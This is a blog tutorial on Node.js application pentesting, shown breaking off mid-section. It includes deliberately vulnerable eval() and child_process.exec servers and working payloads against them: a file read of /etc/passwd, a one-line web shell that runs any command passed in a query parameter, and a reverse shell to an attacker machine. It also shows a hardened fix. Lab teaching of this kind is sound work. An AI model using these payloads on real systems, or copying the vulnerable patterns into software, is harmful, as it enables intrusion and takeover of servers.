<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ-MEf74pkCLnxtSXQOgP3flRZXOtFCpc-LsJgIKeBTlSMIbW1jMJCVBtDwuxpebgjLzGe6C1PcNf4ACIxXR6R2HL-f6yX-4dV8KmvOLj7_Pl09wptV-iW_X7N59slM5aUTpxUcqsjbGU/s1600/Screen+Shot+2017-04-23+at+12.58.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ-MEf74pkCLnxtSXQOgP3flRZXOtFCpc-LsJgIKeBTlSMIbW1jMJCVBtDwuxpebgjLzGe6C1PcNf4ACIxXR6R2HL-f6yX-4dV8KmvOLj7_Pl09wptV-iW_X7N59slM5aUTpxUcqsjbGU/s640/Screen+Shot+2017-04-23+at+12.58.11+PM.png" width="640" /></a></div>
<br />
<br />
E) To install Express temporarily without adding it to the dependencies list, omit the --save option:<br />
$ npm install express<br />
<br />
<div style="text-align: center;">
<b>Pentesting Node.js Application : Nodejs Application Security</b><br />
<b><br /></b></div>
<div style="text-align: left;">
<b>1) Eval() Very Evil </b></div>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
<b>A) Remote Code Execution ( Exploiting Server Side JavaScript Injection ) [ JavaScript Arbitrary Code Execution ]</b></div>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
eval() is a dangerous function: it executes whatever code is passed to it, including code that arrives from user input. This is effectively a remote code execution scenario, where the application runs attacker-supplied code with its own privileges, that is, as the user the Node.js process runs as.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Ex.-1</div>
<b>var x = 2;</b><br />
<b>var y = 2;</b><br />
<b>var z = '10';</b><br />
<b>eval('x + y + 6'); // returns 10</b><br />
<b>eval(z); // returns 10</b><br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Both <b>eval()</b> calls return the value 10.</div>
<div style="text-align: left;">
<br /></div>
Ex. -2<br />
<br />
var express = require('express');<br />
var app = express();<br />
app.get('/', function(req, res) {<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>var resp=<span style="color: red;">eval</span>("("+req.query.<span style="color: red;">input</span>+")");<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>res.send('Output</br>'+<span style="color: red;">resp</span>);<br />
});<br />
app.listen(8001);<br />
<div>
<br /></div>
<div>
<b>[codeexe.js]</b></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwI-JNou5Xkr14OLwgUDxdZTWx831vU_DLumCeaRQxYn2u-tONy-gCYxg1pjlArAMAjAY3L3ub1ZC0UHS6pBZhoaWaCW1L1yj4sfN9SviEDaGfL47nHU0ORInMZlz2JReY85GjqWR4lG8/s1600/Screen+Shot+2017-04-23+at+1.12.43+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwI-JNou5Xkr14OLwgUDxdZTWx831vU_DLumCeaRQxYn2u-tONy-gCYxg1pjlArAMAjAY3L3ub1ZC0UHS6pBZhoaWaCW1L1yj4sfN9SviEDaGfL47nHU0ORInMZlz2JReY85GjqWR4lG8/s320/Screen+Shot+2017-04-23+at+1.12.43+PM.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As we can see, the <b>eval</b> function takes its input from the <b>input</b> parameter without any escaping or filtering; the user input is passed straight to eval(). This is a very common and typical example.</div>
<div class="separator" style="clear: both; text-align: left;">
A user can exploit this vulnerability by passing code in the <b>input</b> parameter.</div>
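To make the difference concrete, here is an added example that is not the original codeexe.js and not Express's code. It puts the vulnerable eval() pattern next to a hardened evaluator that accepts only arithmetic, using a small parser instead of eval, and drives both through an Express-style handler with constructed fake req/res objects so it runs without Express or a listening port.

```javascript
// Added example (not from the original post): the handler pattern from codeexe.js
// as plain functions, beside a hardened version that never hands user input to eval().
// The fake req/res objects and the sample inputs are constructed for the demo.

// Vulnerable: whatever arrives in ?input= is executed as JavaScript.
function evaluateUnsafe(input) {
  return eval('(' + input + ')');
}

// Hardened: accept only a simple arithmetic expression and evaluate it with a
// recursive-descent parser, so identifiers such as process or require are
// never reachable. Anything that is not a number, operator or parenthesis is rejected.
function evaluateArithmetic(input) {
  if (typeof input !== 'string' || input.length > 200) throw new Error('invalid input');
  const tokens = input.match(/\d+(?:\.\d+)?|[-+*\/()]|\s+/g) || [];
  if (tokens.join('') !== input) throw new Error('unexpected characters');
  const ts = tokens.filter(t => !/^\s+$/.test(t));
  let pos = 0;
  const peek = () => ts[pos];
  const next = () => ts[pos++];

  function factor() {
    const t = next();
    if (t === undefined) throw new Error('unexpected end of input');
    if (t === '(') {
      const v = expr();
      if (next() !== ')') throw new Error('missing )');
      return v;
    }
    if (t === '-') return -factor();           // unary minus
    if (/^\d/.test(t)) return Number(t);
    throw new Error('unexpected token ' + t);
  }
  function term() {
    let v = factor();
    while (peek() === '*' || peek() === '/') {
      const op = next();
      const r = factor();
      v = op === '*' ? v * r : v / r;
    }
    return v;
  }
  function expr() {
    let v = term();
    while (peek() === '+' || peek() === '-') {
      const op = next();
      const r = term();
      v = op === '+' ? v + r : v - r;
    }
    return v;
  }
  const result = expr();
  if (pos !== ts.length) throw new Error('trailing input');
  return result;
}

// Express-style handler factory; `evaluate` is whichever evaluator is plugged in.
function makeHandler(evaluate) {
  return function (req, res) {
    try {
      res.send('Output: ' + evaluate(req.query.input));
    } catch (e) {
      res.status(400).send('Bad input');   // reject, do not echo the error text
    }
  };
}

// Drive a handler with a fake request and capture what it would send.
function runHandler(handler, input) {
  const out = { status: 200, body: '' };
  const res = { status(c) { out.status = c; return this; }, send(b) { out.body = b; } };
  handler({ query: { input } }, res);
  return out;
}

console.log(runHandler(makeHandler(evaluateUnsafe), 'process.cwd()'));      // leaks the directory
console.log(runHandler(makeHandler(evaluateArithmetic), 'process.cwd()'));  // 400 Bad input
console.log(runHandler(makeHandler(evaluateArithmetic), '2+2*3'));          // Output: 8
```

The point is that the fix is not escaping or filtering the string: user input should never reach eval(), new Function() or vm.runInThisContext(). If the endpoint needs structured data, use JSON.parse; if it needs arithmetic, parse it as above.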
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First we start our JS code with</div>
<div class="separator" style="clear: both; text-align: left;">
<b>node filename.js</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>node codeexe.js</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMJzljAsR59ztAoi3UCe1eliwa2R-dhns-AxrUGJ2ohrlx7qXkhat0DlGF4Xse0gD3buzTMlMDcNrmFYu16qJ01FDKnTh1zfUN9nP299NOxnXbiCExec6MW57QHRLp0PmyK7KeTGf5CY0/s1600/Screen+Shot+2017-04-23+at+1.36.21+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMJzljAsR59ztAoi3UCe1eliwa2R-dhns-AxrUGJ2ohrlx7qXkhat0DlGF4Xse0gD3buzTMlMDcNrmFYu16qJ01FDKnTh1zfUN9nP299NOxnXbiCExec6MW57QHRLp0PmyK7KeTGf5CY0/s640/Screen+Shot+2017-04-23+at+1.36.21+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
If you see an error while starting this code, it is possible that another service is already running on the same port. First find that process using the <b>ps</b> command.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqYJ-KuCyjxKoDY5TjioX1HAookFoC9kyhXk0LiGlyR4sEi6tj3APmuS75GT3_5M4VX_8XjL-V8hXMexUbWJ5wguhBlVH1BmLVw1ruBIcDilKHiuVEZRDjgA9NlQyY-lNPKHwBl-ZqJLA/s1600/Screen+Shot+2017-04-23+at+1.42.45+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqYJ-KuCyjxKoDY5TjioX1HAookFoC9kyhXk0LiGlyR4sEi6tj3APmuS75GT3_5M4VX_8XjL-V8hXMexUbWJ5wguhBlVH1BmLVw1ruBIcDilKHiuVEZRDjgA9NlQyY-lNPKHwBl-ZqJLA/s640/Screen+Shot+2017-04-23+at+1.42.45+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Then kill the <b>codeexe.js</b> process, whose PID is <b>2959</b>.</div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc9WUXBQQDpSUj3S79WGTPf-NChVf0z2sgqZAPXZK5CWWqqJGvi5t1GGW0OKQ2-0d9QBgL6Y3Dm9jSIjHqePigG6It0yHE14NbauON51gc9EKaT9rRxhKkSrrw2V_4JVNQd_TIYg-o0PY/s1600/Screen+Shot+2017-04-23+at+1.42.45+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc9WUXBQQDpSUj3S79WGTPf-NChVf0z2sgqZAPXZK5CWWqqJGvi5t1GGW0OKQ2-0d9QBgL6Y3Dm9jSIjHqePigG6It0yHE14NbauON51gc9EKaT9rRxhKkSrrw2V_4JVNQd_TIYg-o0PY/s640/Screen+Shot+2017-04-23+at+1.42.45+PM.png" width="640" /></a></div>
<div>
</div>
<div>
So we started our js code. </div>
<div>
<b><br /></b></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMJzljAsR59ztAoi3UCe1eliwa2R-dhns-AxrUGJ2ohrlx7qXkhat0DlGF4Xse0gD3buzTMlMDcNrmFYu16qJ01FDKnTh1zfUN9nP299NOxnXbiCExec6MW57QHRLp0PmyK7KeTGf5CY0/s1600/Screen+Shot+2017-04-23+at+1.36.21+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMJzljAsR59ztAoi3UCe1eliwa2R-dhns-AxrUGJ2ohrlx7qXkhat0DlGF4Xse0gD3buzTMlMDcNrmFYu16qJ01FDKnTh1zfUN9nP299NOxnXbiCExec6MW57QHRLp0PmyK7KeTGf5CY0/s640/Screen+Shot+2017-04-23+at+1.36.21+PM.png" width="640" /></a><br />
<br />
First, we are passing a simple user input to the <b>input </b>parameter as defined in our code.<br />
<br />
<b>http://127.0.0.1:8001/?input=4444441111</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAAbQo1uxVm8xaSu1dXyqfdB0p2wdEeMy3CfWnZOzIcMHw8-gAAbXFHlIsnZ0RMjNu6ERaYO_wdSv2qw8tW7nNhOEPvTgtkjzWFABu8HAgA8Wb9v1HPrNffcs_yT99I1Nqdp6KbCt2-90/s1600/Screen+Shot+2017-04-23+at+1.35.24+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAAbQo1uxVm8xaSu1dXyqfdB0p2wdEeMy3CfWnZOzIcMHw8-gAAbXFHlIsnZ0RMjNu6ERaYO_wdSv2qw8tW7nNhOEPvTgtkjzWFABu8HAgA8Wb9v1HPrNffcs_yT99I1Nqdp6KbCt2-90/s640/Screen+Shot+2017-04-23+at+1.35.24+PM.png" width="640" /></a></div>
<br />
<br />
We used some payloads for the Node.js code execution vulnerability.<br />
Payloads URL - <a href="https://drive.google.com/file/d/0B-LjC3oY6tUpRXZJRXMxbnlvV3M/view">https://drive.google.com/file/d/0B-LjC3oY6tUpRXZJRXMxbnlvV3M/view</a><br />
<br />
Setting up the intruder.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhslu1nRSuWm9OWVBjJhhlpeSup1gwevsWYljx2JXxFsoVOEE5dFH30X_ge3ilE_RQNwIYT8tZWbYOIm3Soi8-58mM0DxlKq_IahACCnBeUXp7b_YNxZB2NZy1dEkgoiHRdu2AJwWmnxM4/s1600/Screen+Shot+2017-04-23+at+1.54.58+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhslu1nRSuWm9OWVBjJhhlpeSup1gwevsWYljx2JXxFsoVOEE5dFH30X_ge3ilE_RQNwIYT8tZWbYOIm3Soi8-58mM0DxlKq_IahACCnBeUXp7b_YNxZB2NZy1dEkgoiHRdu2AJwWmnxM4/s640/Screen+Shot+2017-04-23+at+1.54.58+PM.png" width="640" /></a></div>
<br />
The payloads were as follows.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL4ZrOWZkmlo33oS21lwdYvDDd_E-00b3B9GNrJ3uIeFFJ3Af7etFUCORghmIEgBG1NIE3rLeFpzMQBlWY1Il9vEH8yNcxN6I6Wxfo5-tvq7q2DEveo-9eKwr7QsR8u_gWQutfs9JsIXw/s1600/Screen+Shot+2017-04-23+at+2.39.58+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL4ZrOWZkmlo33oS21lwdYvDDd_E-00b3B9GNrJ3uIeFFJ3Af7etFUCORghmIEgBG1NIE3rLeFpzMQBlWY1Il9vEH8yNcxN6I6Wxfo5-tvq7q2DEveo-9eKwr7QsR8u_gWQutfs9JsIXw/s640/Screen+Shot+2017-04-23+at+2.39.58+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Intruder attack result.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We can see that the <b>process.cwd()</b> response contains the <b>current working directory, "/Users/narendrabhati/Node JS Pentesting"</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDlu1DNHiSF7C2yJcjpdNUuFalEiieqOopaoDNaCjG8VYtBMr7KQx8cmZTYNhk86K4kBmsbKllIttI7XEq0gPBtdw1oXm2tyG7Ft3Mq_feMl7CNT9V2WcFa0UzpnB_d5oOUGKoZ1rVLAY/s1600/Screen+Shot+2017-04-23+at+2.41.05+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="448" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDlu1DNHiSF7C2yJcjpdNUuFalEiieqOopaoDNaCjG8VYtBMr7KQx8cmZTYNhk86K4kBmsbKllIttI7XEq0gPBtdw1oXm2tyG7Ft3Mq_feMl7CNT9V2WcFa0UzpnB_d5oOUGKoZ1rVLAY/s640/Screen+Shot+2017-04-23+at+2.41.05+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
After confirming the injection we can perform whatever operations we want. For example, we can read internal files: </div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>http://127.0.0.1:8001/?input=res.end(require('fs').readFileSync('/etc/passwd').toString())</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0dQ2z_xgsdxckYAMOaMpySpRmlKRuLeHxfVHSnh1jxIfucPnikFfgRHdIt3uvQ01AsuM7RyRjZHDuLFij_muxX04vH3G7F700ZpCqB2jpDQQ7-xlfmVpE2aoJs06dKQOArDWiAMOfbPI/s1600/Screen+Shot+2017-04-23+at+3.12.51+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="572" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0dQ2z_xgsdxckYAMOaMpySpRmlKRuLeHxfVHSnh1jxIfucPnikFfgRHdIt3uvQ01AsuM7RyRjZHDuLFij_muxX04vH3G7F700ZpCqB2jpDQQ7-xlfmVpE2aoJs06dKQOArDWiAMOfbPI/s640/Screen+Shot+2017-04-23+at+3.12.51+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now we move on to a simple web shell, just like a simple PHP shell, from which system commands can be executed.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The payload below will start a new web server, or you could say a new Node.js app, on port 8002 after 8 seconds. Let's try it.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>setTimeout(function() { require('http').createServer(function (req, res) { res.writeHead(200, {"Content-Type": "text/plain"});require('child_process').exec(require('url').parse(req.url, true).query['cmd'], function(e,s,st) {res.end(s);}); }).listen(8002); }, 8000)</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyWfAsMI71XATD3S-Fdq2ylL_1g_8_tEFveqCVHGwC5i_PdeXDKpdeAmz3mmy9eHnIug3dcKCyWrKY_SN5HblbS9wdSs43AGsU70vy3N27bO-MfJkA8sT9UcHpv5kW-waJYUoUOGdEhUw/s1600/Screen+Shot+2017-04-23+at+3.30.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyWfAsMI71XATD3S-Fdq2ylL_1g_8_tEFveqCVHGwC5i_PdeXDKpdeAmz3mmy9eHnIug3dcKCyWrKY_SN5HblbS9wdSs43AGsU70vy3N27bO-MfJkA8sT9UcHpv5kW-waJYUoUOGdEhUw/s640/Screen+Shot+2017-04-23+at+3.30.11+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
After 8 seconds the target is reachable on port 8002, and commands are passed through the <b>cmd</b> parameter.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>http://127.0.0.1:8002/?cmd=ls ; uname -a ; whoami</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZAN8EGIQZdFj5x2rarEcsaYKCtjoJoEyNc9Xc2cgDHeVwT1aDMafRSQSFpXcIBLfb9KjOLlzGpmIoVjuPQitrY5KqJsQMLRSbFUXmuPkDJZ4lvUL1BVSp1cZNhRMp5kwXCHBrafYV8wk/s1600/Screen+Shot+2017-04-23+at+3.32.00+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZAN8EGIQZdFj5x2rarEcsaYKCtjoJoEyNc9Xc2cgDHeVwT1aDMafRSQSFpXcIBLfb9KjOLlzGpmIoVjuPQitrY5KqJsQMLRSbFUXmuPkDJZ4lvUL1BVSp1cZNhRMp5kwXCHBrafYV8wk/s640/Screen+Shot+2017-04-23+at+3.32.00+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Reverse Connection</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<b>B) Reverse Shell ( Exploiting Server Side JavaScript Injection )</b><br />
<b><br /></b>
To get a reverse shell we can use the nodejsshell.py Python script, which you can find <a href="https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py" target="_blank">here</a>.<br />
This script generates JS code for the given <b>attacker IP and attacker local port.</b><br />
It comes in very handy when you have a direct connection to the Node.js application, or when both are on the same network.<br />
<br />
Below, I first tested a successful ping to my Kali machine [192.168.131.134] and then ran nodejsshell.py with my Kali machine IP <b>192.168.131.134</b> as the attacker address and 4444 as the attacker port.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYDSu7ge4o3OnQfzIiVcjV_77roHSx80rhEGbVaidzdFZB749u7bECe6uGBJfcYfwskiK-i22veC6htBaaMVTOmMDoIXfx14GS7ipLxSFl1Bo6TodOq_C-5zaUGO6IBXFtW-GCPz7g0RE/s1600/Screen+Shot+2017-04-23+at+3.43.39+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYDSu7ge4o3OnQfzIiVcjV_77roHSx80rhEGbVaidzdFZB749u7bECe6uGBJfcYfwskiK-i22veC6htBaaMVTOmMDoIXfx14GS7ipLxSFl1Bo6TodOq_C-5zaUGO6IBXFtW-GCPz7g0RE/s640/Screen+Shot+2017-04-23+at+3.43.39+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
On my Kali machine, I am waiting for a connection on port 4444.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1h4ebHVmyhL7u5g_hhDu1SnaoM3iC3lZTfac3hyphenhyphen86TMGGZe1JB9_qRMePNajdTrTvCfjEHOazmXiVYLLft7LSbp68VgAveT3eF5gVW2pqfkRWQ5yzFPKjB73i_FTqOX7HvRZgBTtlQQM/s1600/Screen+Shot+2017-04-23+at+3.50.58+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1h4ebHVmyhL7u5g_hhDu1SnaoM3iC3lZTfac3hyphenhyphen86TMGGZe1JB9_qRMePNajdTrTvCfjEHOazmXiVYLLft7LSbp68VgAveT3eF5gVW2pqfkRWQ5yzFPKjB73i_FTqOX7HvRZgBTtlQQM/s640/Screen+Shot+2017-04-23+at+3.50.58+PM.png" width="640" /></a></div>
<br />
<br />
I injected the code generated by nodejsshell.py into the application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv61eBudgKE4KzyNCzUx0FE0f8wmwWZnun-oDJNBFDLY_MFyCgkDFcKQ6XDsaTj0DXz_LfIsmEGMB6N5kFcsXnmI7rpIWr6DAf0hfFwNFA5lKYrw4FVAXcAyqnE1fRiNYhIprNVJL4cv0/s1600/Screen+Shot+2017-04-23+at+3.45.41+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv61eBudgKE4KzyNCzUx0FE0f8wmwWZnun-oDJNBFDLY_MFyCgkDFcKQ6XDsaTj0DXz_LfIsmEGMB6N5kFcsXnmI7rpIWr6DAf0hfFwNFA5lKYrw4FVAXcAyqnE1fRiNYhIprNVJL4cv0/s640/Screen+Shot+2017-04-23+at+3.45.41+PM.png" width="640" /></a></div>
<br />
And I got the reverse shell on my Kali machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLkF1YI61xOpV-lUE2fsK4eQ2_uT9cSB6s_mPryozuWQqRpHSPkQkMw3MtYonTfRabyIx8Q45ifjcCwu5C13x5ocw89RONtOChy0jnguMlkZnIbxwUiTto6gSPDlqpB0hq-O4sUQKomeE/s1600/Screen+Shot+2017-04-23+at+3.49.34+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="134" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLkF1YI61xOpV-lUE2fsK4eQ2_uT9cSB6s_mPryozuWQqRpHSPkQkMw3MtYonTfRabyIx8Q45ifjcCwu5C13x5ocw89RONtOChy0jnguMlkZnIbxwUiTto6gSPDlqpB0hq-O4sUQKomeE/s640/Screen+Shot+2017-04-23+at+3.49.34+PM.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>2) Remote OS Command Execution</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Similar to <b>Remote Code Execution ( Exploiting Server Side JavaScript Injection )</b>, this vulnerability also allows an attacker to perform arbitrary command execution. The key difference is that this vulnerability occurs because of unsafe use of <b>exe.exec</b> (child_process.exec), the call that lets the application run system/OS commands.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
[nodejsrce.js]</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<b>var http = require("http");</b></div>
<div class="separator" style="clear: both;">
<b>var url = require("url");</b></div>
<div class="separator" style="clear: both;">
<b>var exe = require('child_process');</b></div>
<div class="separator" style="clear: both;">
<b>http.createServer(function(request, response)</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>{</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>var parsedUrl = url.parse(request.url, true);</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>response.writeHead(200, {"Content-Type": "text/html"});</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>// user input is concatenated into a shell command string: this is the injection point</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>exe.exec('ping -c 4 ' + parsedUrl.query.inject, function (err, data)</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>{</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>response.write("RCE-DEMO " + data);</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>response.end();</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>});</b></div>
<div class="separator" style="clear: both;">
<b><span class="Apple-tab-span" style="white-space: pre;"> </span>}).listen(8005);</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWImcrzHB4wnLU8VXbQq8ejz5gWOJvaw0Oi8HPeiCkgAw-he-nHJR6O98wpCAfg4zqdOnXG9i8AJVAAsWgfosJhEFk6Va7wlFrr8ZT2W6DVOPnkMsDNX16fTY3Jc9v_GAc8IZpIic_XVE/s1600/Screen+Shot+2017-04-23+at+4.13.23+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWImcrzHB4wnLU8VXbQq8ejz5gWOJvaw0Oi8HPeiCkgAw-he-nHJR6O98wpCAfg4zqdOnXG9i8AJVAAsWgfosJhEFk6Va7wlFrr8ZT2W6DVOPnkMsDNX16fTY3Jc9v_GAc8IZpIic_XVE/s640/Screen+Shot+2017-04-23+at+4.13.23+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
Looking at the source code, we can see that <b>exe.exec</b> takes user input from the <b>inject</b> parameter without filtering or escaping it. As a result a user/attacker can inject any value, which allows them to perform <b>NodeJS</b> <b>Remote OS Command Execution.</b></div>
<div>
<b><br /></b></div>
<div>
Below is our application's ping command example.</div>
<div>
<b><br /></b></div>
<div>
<b>http://127.0.0.1:8005/?inject=google.com</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixm3gcG3ErnGHA5zfo-eGHLWu_ynzAbTALAegw9qs4R_cuQ642XSVD3G7tOMa5eJu-Kwez4pPa3sgp9iLpwvkmeu-PRqGWrKwAmuUKtb5IqCx1SGvwIzxZMRUgUM-LBOJuasT6g85QsjA/s1600/Screen+Shot+2017-04-23+at+4.18.01+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixm3gcG3ErnGHA5zfo-eGHLWu_ynzAbTALAegw9qs4R_cuQ642XSVD3G7tOMa5eJu-Kwez4pPa3sgp9iLpwvkmeu-PRqGWrKwAmuUKtb5IqCx1SGvwIzxZMRUgUM-LBOJuasT6g85QsjA/s640/Screen+Shot+2017-04-23+at+4.18.01+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<div>
